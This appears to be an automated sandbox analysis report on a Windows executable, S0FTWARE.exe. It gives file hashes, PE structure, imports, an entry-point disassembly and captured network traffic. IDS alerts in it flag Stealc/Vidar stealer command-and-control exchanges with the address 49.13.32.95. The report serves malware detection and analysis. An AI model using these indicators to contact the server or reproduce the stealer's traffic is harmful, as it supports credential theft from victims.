                                                                                                                                                                                                                                                                                                                  SHA1:8F395D7C32AFE6CB61A1EC77EC404E27F87B5248
                                                                                                                                                                                                                                                                                                                  SHA-256:FACD4309C11A26F83A6551B0F12470C95BC88297E6E01A57CE960AF0D7E3FE1A
                                                                                                                                                                                                                                                                                                                  SHA-512:F8F8DAC68EBA19FA73575B589532B79A1F989C41ACA7CA9AFA062768902C0B3B9EF88E58E29B27265D7362DB683EDA2444FF5D500CAD8393B8AD252CED9471E2
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 21 13:48:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2679
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9996670752156116
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:8x0d2TyO2cH6idAKZdA1leh/iZUkAQkqehny+2:8x9/2K9QKy
                                                                                                                                                                                                                                                                                                                  MD5:254A0959412E38776A947CAE070D006B
                                                                                                                                                                                                                                                                                                                  SHA1:7FDE4C6C22C268B8B197ECA87F2BB5076F683739
                                                                                                                                                                                                                                                                                                                  SHA-256:8AE13F531F5B1114B249CC66FC70558FBC7BC603E6461F8D6964970E228FAC5F
                                                                                                                                                                                                                                                                                                                  SHA-512:E191C3B276DBDDC6E007672A71B29F6291DA86FADAEB590943025CAB7C44C0DC76216BC9BED9F8CDBB75A8ACEA4EDF00E4301ADD198022CB474D363841C00251
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2693
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.008761234881798
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:8j0d2TyObH6idAKZdA14t5eh7sFiZUkmgqeh7sBy+BX:8j9/Pnzy
                                                                                                                                                                                                                                                                                                                  MD5:E3DD729568709E88CB1B77C215E53A6E
                                                                                                                                                                                                                                                                                                                  SHA1:D230E3CF73882CC42D1F6F92F8F9EE221C38986F
                                                                                                                                                                                                                                                                                                                  SHA-256:9C96E7FFD58C380F1D911161898114F5D1F8E39E6BB72658E029313A13F55F0A
                                                                                                                                                                                                                                                                                                                  SHA-512:A9DF9A768D75988BFAA3DD0EDE649CCE05ACBAC814431ED5F2E56205CCC43DE07677814C4D8CE889EA1572E26454D2DED1C421DE42BC4003856577A7E1370D0A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 21 13:48:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2681
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9977782865204796
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:8t0d2TyO2cH6idAKZdA16ehDiZUkwqehby+R:8t9/2hpy
                                                                                                                                                                                                                                                                                                                  MD5:B2CC05B3B3BC07F1EC41569AB29B1728
                                                                                                                                                                                                                                                                                                                  SHA1:E1C0CCC675FD30ECC11EE09C60442E58D253B7EE
                                                                                                                                                                                                                                                                                                                  SHA-256:F6622703CDF92102EA6E21CBCD04BA4657A3910056735E2ABCE2384D8B44DE30
                                                                                                                                                                                                                                                                                                                  SHA-512:AC9077910898C6E0F89209E0A0A6E9069BCD16608BAF6E4074AD16892F8ECC2E9B1721766E3548ED0CD81B83B67F0BFAB9D0EAA098C49220E547D12A46D20F2E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 21 13:48:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2681
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9891091115370583
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:8c0d2TyO2cH6idAKZdA1UehBiZUk1W1qehty+C:8c9/2B9Ny
                                                                                                                                                                                                                                                                                                                  MD5:D1EDA6C4000CFB49471835F3F80FD6FB
                                                                                                                                                                                                                                                                                                                  SHA1:FEC0D4C7D7289902B89C3C2B1D83C967886F664B
                                                                                                                                                                                                                                                                                                                  SHA-256:C25AF9576BBAEDE8634CB1B315CC4E35084C43F952E3900F469A9D6BED578AD9
                                                                                                                                                                                                                                                                                                                  SHA-512:DC8167FAA297D8BD64FF918579AC4F4320671D6D496FE3B74A38B7553E1D283A3D284936603AB1B54021797A53F370735CDC43538C36E02EF58440EE41657EAA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 21 13:48:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2683
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.996159743529515
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:8g0d2TyO2cH6idAKZdA1duTrehOuTbbiZUk5OjqehOuTbzy+yT+:8g9/2eTYTbxWOvTbzy7T
                                                                                                                                                                                                                                                                                                                  MD5:FED9A0B8729818B9940CD29BADC2A400
                                                                                                                                                                                                                                                                                                                  SHA1:BDB0812C38A11888E7B70FC0F9C3A316522E87EF
                                                                                                                                                                                                                                                                                                                  SHA-256:C1BF888F44190D844851B136D05A6CA1680A0923E352601218E4EAB4436AAA23
                                                                                                                                                                                                                                                                                                                  SHA-512:4E09E3799BF5D10FC24B1FB85C9164ADF5E695A9202824A9152367FC2FBD86836B2E7C0B748D75E6573C608BA50390E38E59747AC546AACFE3B9B58408FC3295
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (766)
                                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                                  Size (bytes):771
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.139286770870073
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Sw1x2fPF+ssAoWBHslgT9lCuABuFA7F7HHHHHHHYqmffffffo:d18fPSARKlgZ01BuFYFEqmffffffo
                                                                                                                                                                                                                                                                                                                  MD5:D8A934708568BA4C3C5A7CD9B2D03958
                                                                                                                                                                                                                                                                                                                  SHA1:4C12AF38C839B983410CFB5FE5A3461CA4ED0D75
                                                                                                                                                                                                                                                                                                                  SHA-256:A44F15962C1C2B10374676C3D0D23A18AE8F56EF421E8E1C9ABD5583F438E7C4
                                                                                                                                                                                                                                                                                                                  SHA-512:F4BC540D5DEAC2FA35C56B02DD9A0024A6B53D21CB870C5FE9554E5300C6B0D2FB8484FB03DA361CE3EB4C0DA393F6393901BDC31EEBF0886FCBFDA99E874454
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                                  Preview:)]}'.["",["high potential new episodes","final fantasy xiv mobile","spacex starship test flight","magnetic north pole moving","eli morgan cubs trade","weather tornado warning","cma awards 2024 winners","wordle hint november 21"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1251,1250,601,600,553,552,551,550],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                                  MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                                  SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                                  SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                                  SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                                  Size (bytes):132965
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.435146399832278
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:fmkXyPqO7UX1Hme9kZbs4Voc5rSnXqwQ2i6o:fZyWFHrp4Voc5rSnawQ8o
                                                                                                                                                                                                                                                                                                                  MD5:8725FAC5D30D86E895557023D40B0C1E
                                                                                                                                                                                                                                                                                                                  SHA1:43C8A5AB28175761BE25492BD1DA3D0CAF28A61D
                                                                                                                                                                                                                                                                                                                  SHA-256:4CBC0031A7B48C1DE21D0A8A43B4A89FD368D2E7F85F9D9926F9A3F4FB785D7D
                                                                                                                                                                                                                                                                                                                  SHA-512:56366B8E076D5057D3BB3288C81E9D5A56174EB1582B6DB9BBD2587397EB948F4A70816240E001E5E781D49F7804D03A6E3CBD456D2A587A2F0735F6939ABBE7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.4307570372523415
                                                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                                  File name:S0FTWARE.exe
                                                                                                                                                                                                                                                                                                                  File size:5'526'528 bytes
                                                                                                                                                                                                                                                                                                                  MD5:0da768d82b6b4b1ce65f888d4191a228
                                                                                                                                                                                                                                                                                                                  SHA1:0c040af6c4702c1efc41de91c8c670a33f91f7c1
                                                                                                                                                                                                                                                                                                                  SHA256:52d6508cc82d8084af7ed3097832a425678837366b171945a47b3d6a76f448ff
                                                                                                                                                                                                                                                                                                                  SHA512:a545072e17ecac1d8efe4ff8b80640f239f0d8f02941108426418a47562a8fc21ba90c6cba827d3701d06b9cce1c05f80c5607c388bb61d5d269db9a059f97d2
                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:18wBD04K2Sv0reUvdYeUpbzB64uXMhWCzgoFkMbV0AmYSpuaDIVpG/xnVPiTJoMk:18wt02+KeOLCzuLPiGtW8b
                                                                                                                                                                                                                                                                                                                  TLSH:11465A50FADB84F5EA03093114A793BF17307D098B34DA8BEA147F6AE8776D10E32659
                                                                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........R...............$...................K...@...........................W.......T...@................................
                                                                                                                                                                                                                                                                                                                  Icon Hash:3b6120282c4c5a1f
                                                                                                                                                                                                                                                                                                                  Entrypoint:0x45fcd0
                                                                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                                                                                                  OS Version Minor:1
                                                                                                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                                                                                                  File Version Minor:1
                                                                                                                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                                                                                                                                                                                  Import Hash:9cbefe68f395e67356e2a5d8d1b285c0
                                                                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                                                                  jmp 00007F9B204FD080h
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                                                                  sub esp, 28h
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+10h], ebp
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+14h], esi
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+18h], edi
                                                                                                                                                                                                                                                                                                                  mov esi, eax
                                                                                                                                                                                                                                                                                                                  mov edx, dword ptr fs:[00000014h]
                                                                                                                                                                                                                                                                                                                  cmp edx, 00000000h
                                                                                                                                                                                                                                                                                                                  jne 00007F9B204FF389h
                                                                                                                                                                                                                                                                                                                  mov eax, 00000000h
                                                                                                                                                                                                                                                                                                                  jmp 00007F9B204FF3E6h
                                                                                                                                                                                                                                                                                                                  mov edx, dword ptr [edx+00000000h]
                                                                                                                                                                                                                                                                                                                  cmp edx, 00000000h
                                                                                                                                                                                                                                                                                                                  jne 00007F9B204FF387h
                                                                                                                                                                                                                                                                                                                  call 00007F9B204FF479h
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+20h], edx
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+24h], esp
                                                                                                                                                                                                                                                                                                                  mov ebx, dword ptr [edx+18h]
                                                                                                                                                                                                                                                                                                                  mov ebx, dword ptr [ebx]
                                                                                                                                                                                                                                                                                                                  cmp edx, ebx
                                                                                                                                                                                                                                                                                                                  je 00007F9B204FF39Ah
                                                                                                                                                                                                                                                                                                                  mov ebp, dword ptr fs:[00000014h]
                                                                                                                                                                                                                                                                                                                  mov dword ptr [ebp+00000000h], ebx
                                                                                                                                                                                                                                                                                                                  mov edi, dword ptr [ebx+1Ch]
                                                                                                                                                                                                                                                                                                                  sub edi, 28h
                                                                                                                                                                                                                                                                                                                  mov dword ptr [edi+24h], esp
                                                                                                                                                                                                                                                                                                                  mov esp, edi
                                                                                                                                                                                                                                                                                                                  mov ebx, dword ptr [ecx]
                                                                                                                                                                                                                                                                                                                  mov ecx, dword ptr [ecx+04h]
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp], ebx
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+04h], ecx
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+08h], edx
                                                                                                                                                                                                                                                                                                                  call esi
                                                                                                                                                                                                                                                                                                                  mov eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                                                                  mov esp, dword ptr [esp+24h]
                                                                                                                                                                                                                                                                                                                  mov edx, dword ptr [esp+20h]
                                                                                                                                                                                                                                                                                                                  mov ebp, dword ptr fs:[00000014h]
                                                                                                                                                                                                                                                                                                                  mov dword ptr [ebp+00000000h], edx
                                                                                                                                                                                                                                                                                                                  mov edi, dword ptr [esp+18h]
                                                                                                                                                                                                                                                                                                                  mov esi, dword ptr [esp+14h]
                                                                                                                                                                                                                                                                                                                  mov ebp, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                                                                  mov ebx, dword ptr [esp+1Ch]
                                                                                                                                                                                                                                                                                                                  add esp, 28h
                                                                                                                                                                                                                                                                                                                  retn 0004h
                                                                                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                                                                  mov edx, dword ptr [ecx]
                                                                                                                                                                                                                                                                                                                  mov eax, esp
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x541000 | 0x3dc | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x562000 | 0x16438 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x542000 | 0x1efd2 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x4bed60 | 0xa0 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x24c695 | 0x24c800 | 6906e98230875147600a4037a2ba6e66 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x24e000 | 0x26f8fc | 0x26fa00 | 76b9a78ee9a805b0e3df9d486df44479 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4be000 | 0x82cc8 | 0x53200 | db3d8bb644553e87fb49f32ef27f1fad | False | 0.389203477443609 | data | 5.619634929665022 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x541000 | 0x3dc | 0x400 | 5148b9b98424957e60566f0199699ca0 | False | 0.4873046875 | data | 4.632010323785184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x542000 | 0x1efd2 | 0x1f000 | fc38af53e986a5cff5a9a9c06e0cac99 | False | 0.5627362651209677 | data | 6.643685617882402 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab | 0x561000 | 0x4 | 0x200 | 07b5472d347d42780469fb2654b7fc54 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x562000 | 0x16438 | 0x16600 | 4ebce59d7e4fc7b0964660e118e1b32b | False | 0.841524092178771 | data | 7.405440786604266 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x5622f4 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1536 | English | United States | 0.325
RT_ICON | 0x56295c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.4166666666666667
RT_ICON | 0x562c44 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5777027027027027
RT_ICON | 0x562d6c | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2688 | English | United States | 0.6226012793176973
RT_ICON | 0x563c14 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.7369133574007221
RT_ICON | 0x5644bc | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.5476878612716763
RT_ICON | 0x564a24 | 0xf199 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9981082960112532
RT_ICON | 0x573bc0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5300829875518672
RT_ICON | 0x576168 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6137429643527205
RT_ICON | 0x577210 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.19680851063829788
RT_GROUP_ICON | 0x577678 | 0x92 | data | English | United States | 0.6438356164383562
RT_VERSION | 0x57770c | 0x584 | data | English | United States | 0.2790368271954674
RT_MANIFEST | 0x577c90 | 0x7a8 | XML 1.0 document, ASCII text, with very long lines (391), with CRLF line terminators | English | United States | 0.3464285714285714
DLL | Import
kernel32.dll | WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-21T15:48:02.385968+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 49.13.32.95 | 443 | 192.168.2.8 | 49715 | TCP
2024-11-21T15:48:04.837219+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.8 | 49717 | 49.13.32.95 | 443 | TCP
2024-11-21T15:48:04.837402+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 49.13.32.95 | 443 | 192.168.2.8 | 49717 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.934618950 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.934736013 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.054861069 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.069073915 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.071723938 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.074512005 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.074569941 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.074572086 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.074620008 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.076598883 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.076874018 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.127073050 CET49673443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.200124025 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.245667934 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.273541927 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.273561954 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.273674965 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.361479998 CET49672443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.410654068 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.420456886 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.420516014 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.420552015 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.470803976 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.500329971 CET49707443192.168.2.813.107.246.63
